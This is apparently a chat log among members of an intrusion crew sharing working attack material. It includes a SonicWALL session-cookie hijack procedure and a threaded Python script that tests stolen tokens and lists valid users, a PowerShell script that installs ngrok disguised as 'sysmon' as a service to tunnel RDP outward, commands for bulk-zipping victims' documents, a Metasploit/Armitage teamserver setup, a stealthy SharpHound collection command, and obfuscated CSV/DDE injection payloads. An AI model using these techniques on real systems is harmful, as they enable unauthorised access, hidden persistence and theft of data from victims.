Message: powershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB }}-AutoSize
who will tell you how to correctly point to a file with ip addresses so as not to drive them in with a comma
tried : `(Get-Content C:\programdata\list.txt)` but it says invalid argument
output:
```
#<CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><SS="Error">Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argum_x000D__x000A_</S><SS="Error">ent is null or empty. Provide an argument that is not null or empty, and then t_x000D__x000A_</S><SS="Error">ry the command again._x000D__x000A_</S><SS="Error">At line:1 char:54_x000D__x000A_</ S><SS="Error">+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programd_x000D__x000A_</S><SS="Error">ata ..._x000D__x000A_</S><SS=" Error">+ ~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><SS="Error">~~~_x000D__x000A_</S><SS ="Error"> + CategoryInfo : InvalidData: (:) [Get-WmiObject], ParameterBindi _x000D__x000A_</S><SS="Error"> ngValidationException_x000D__x000A_</S><SS="Error"> + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft .Power _x000D__x000A_</S><SS="Error"> Shell.Commands.GetWmiObjectCommand_x000D__x000A_</S><SS="Error"> _x000D__x000A_</S></Objs>
```
Date: 2021-02-09T11:34:55.738Z
From: ali
Message: SonicWALL

- encode the session ID in base64
```
>> btoa("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- I drive in the URL `https://target` (redirect to https://target/cgi-bin/welcome)
- add cookie in console
```
document.cookie="swap=NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- in the browser (where .../cgi-bin/welcome) edit the URL to `https://target/cgi-bin/portal`
- throws again on the page `https://target/cgi-bin/welcome`



Date: 2021-02-17T00:28:46.571Z
From: giovanni
Message: ```
mkdir "C:\Windows\tmp"
# Download NGROK
$clnt = new-object System.Net.WebClient
$url = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
$file = "C:\Windows\tmp\ngrok.zip"
$clnt.DownloadFile($url,$file)

# Unzip NGROK
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C:\Windows\tmp\")
$destination.Copyhere($zip_file.items())

#Download NSSM

$clnt = new-object System.Net.WebClient
$url = "http://nssm.cc/release/nssm-2.24.zip"
$file = "C:\Windows\tmp\nssm.zip"
$clnt.DownloadFile($url,$file)

#Unzip NSSM
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C:\Windows\tmp")
$destination.Copyhere($zip_file.items())

Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe"

echo 'authtoken: 1nkQQOeCRwXSyjxVs1jCOvlQ6XQ_s2fbYS124PZwt36bUVP5
tunnels:
default:
proto: tcp
addr: 3389' > "C:\Windows\tmp\config.yml"

cd "C:\Windows\tmp\nssm-2.24\win64"
.\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config="C:\Windows\tmp\config.yml"

Start-Service sysmon

Date: 2021-03-16T16:58:34.375Z
From: code
Message: ```
import os
import sys
import requests
import json
import time
import threading
import base64

main_url = sys.argv[1]
file_uri = sys.argv[2]

print('Site: ' + main_url)

def checkToken(token, user, password, domain):
global listOfUsers

base64_token = base64.b64encode(token.encode("utf-8")).decode("utf-8")

portal_url = 'https://' + main_url + '/cgi-bin/portal'

headersData = {
'Cookie' : 'swap=' + base64_token + '; SessURL=https%3A%2F%2F' + main_url + '%2Fcgi-bin%2Fwelcome',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0',
'Content-type': 'application/json',
'Origin': 'Origin: https://' + main_url,
'Referer': 'https://' + main_url + '/cgi-bin/welcome',
'Accept-encoding': 'gzip, deflate, br',
'Accept-language': 'en-US,en;q=0.5'
}

print('Check user: ' + user)

x = requests.get(portal_url, headers = headersData, verify = False)

if x.status_code == 200:
if(x.text == '<HTML><HEAD><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><meta http-equiv="refresh" content="0; URL=/cgi- bin/welcome"></HEAD><BODY></BODY></HTML>'):
print('Bad')
else:
listOfUsers += 'User: ' + user + ' Password: ' + password + ' B64 token:' + base64_token + '\n'
print ('Good :' + user)

json_array = json.loads(open(file_uri).read())

thread_list = []
listOfUsers = ''

i = 0
for item in json_array:
i += 1
item = item.split(' ')

thread = threading.Thread(target=checkToken, args=(item[0], item[2], item[3], item[4]))
thread.start()
thread_list.append(thread)
if i % 10 == 0:
time.sleep(5)

[thread.join() for thread in thread_list]

print('\n\n\n\n' + listOfUsers)

Date: 2021-04-30T12:44:26.467Z
From: Kalinka
Message: -rtt means recursion(r) and command to pack by modification date(tt)
usually everything is packed with recursion in order to zip the folder normally
again, `-tt` is FROM the given date, `-t` is BEFORE the given date

Date: 2021-04-30T12:41:06.075Z
From: Tyr
Message: the -rt command is recursive, but what would happen without recursion, you need to write without r in -rtt, i.e. -rt. it is clear that the porridge is not clear, where is the error in the command or description?

Date: 2021-04-30T13:02:57.223Z
From: Kalinka
Message: ```
PACKING IN ZIP FILES BY DATE OF CHANGE
zip -rt 2018-01-01 C:\Programdata\zip.zip C:\users\admin\Documents\ - packs RECURSIVELY (remove r in -rt without recursion) all files in the Documents folder into a zip.zip archive up to the specified date , that is, it pumps out all the docks until 2018, it does not take older
If for some reason you need from 2018, then we write -rtt (if without recursion, then just -tt)
```

Date: 2021-06-07T19:41:16.802Z
From: sarm
Message: I followed this script before
```
This manual is for Ubuntu.

first install nano, screen, unzip

sudo apt-get install nano screen unzip

Next, create a file 1.sh:
nano 1.sh
Next, paste the block of code:

1. java installation (1.sh)
Code:

sudo apt-get update
sudo apt-get -y install --reinstall software-properties-common
sudo apt-get install default-jre
sudo apt-get update
sudo apt-get -y --force-yes install git build-essential unzip libreadline-dev zlib1g-dev nano screen libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g -dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
sudo apt-get update
sudo apt-get upgrade
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

then CTRL+X (save) PRESS Y ENTER ENTER
repeat the same for each item
set rights:
chmod +x 1.sh
execute 1.sh:
./1.sh
now each command is executed in turn

2. install ruby (2.sh)
Code:

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL

3. install ruby (3.sh)
Code:

RUBYVERSION=2.4.3
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v

4. install nmap (4.sh)
Code:

mkdir ~/Development
cd ~/Development
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
make clean

5. creating a database and a database user. execute the commands one by one (without nano):
Code:

su postgres
cd
createuser msf -P -S -R -D
#enter password qwe31337
createdb -O msf msf
exit

6. install msf (5.sh)
Code:

mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

7. install armitage (6.sh)
Code:

echo cHJvZHVjdGlvbjoNCiBhZGFwdGVyOiBwb3N0Z3Jlc3FsDQogZGF0YWJhc2U6IG1zZg0KIHVzZXJuYW1lOiBtc2YNCiBwYXNzd29yZDogcXdlMzEzMzcNCiBob3N0OiAxMjcuMC4wLjENCiBwb3J0OiA1NDMyDQogcG9vbDogNzUNCiB0aW1lb3V0OiA1DQo = | base64 --decode> /opt/metasploit-framework/config/database.yml
cd /opt/
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver


After installation, create screen (to work in the background):
screen -dmS arm
screen -x arm
cd /opt/armitage/
execute ifconfig, look at your IP
./teamserver HERE_IPI_VDSKI HERE_PASSWORD

Date: 2021-06-21T14:10:49.195Z
From: white
Message: `execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\programdata\`

Date: 2022-02-02T11:25:59.551Z
From: ryan
Message: Ruby, if you need to obfuscate it, then you can write a bunch of characters ^ and " inside the command line
For example like this:

```
DDE("cmd";"/C c^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^alc"; "!A0")A0
@SUM(1+9)*cmd|' /Ccalc'!A0
=10+20+cmd|' /C c"""""""""""""""""""""""""""""""""""""alc'!A0
=cmd|' /Cnotepad'!'A1'
```

Date: 2022-02-02T11:03:12.734Z
From: ryan
Message: Need test file test.csv to test this exploit ?
Then just this code should be saved in the file test.csv
```
DDE("cmd";"/Ccalc";"!A0")A0
@SUM(1+9)*cmd|' /Ccalc'!A0
=10+20+cmd|' /Ccalc'!A0
=cmd|' /Cnotepad'!'A1'
```
Excel will launch the calculator with notepad
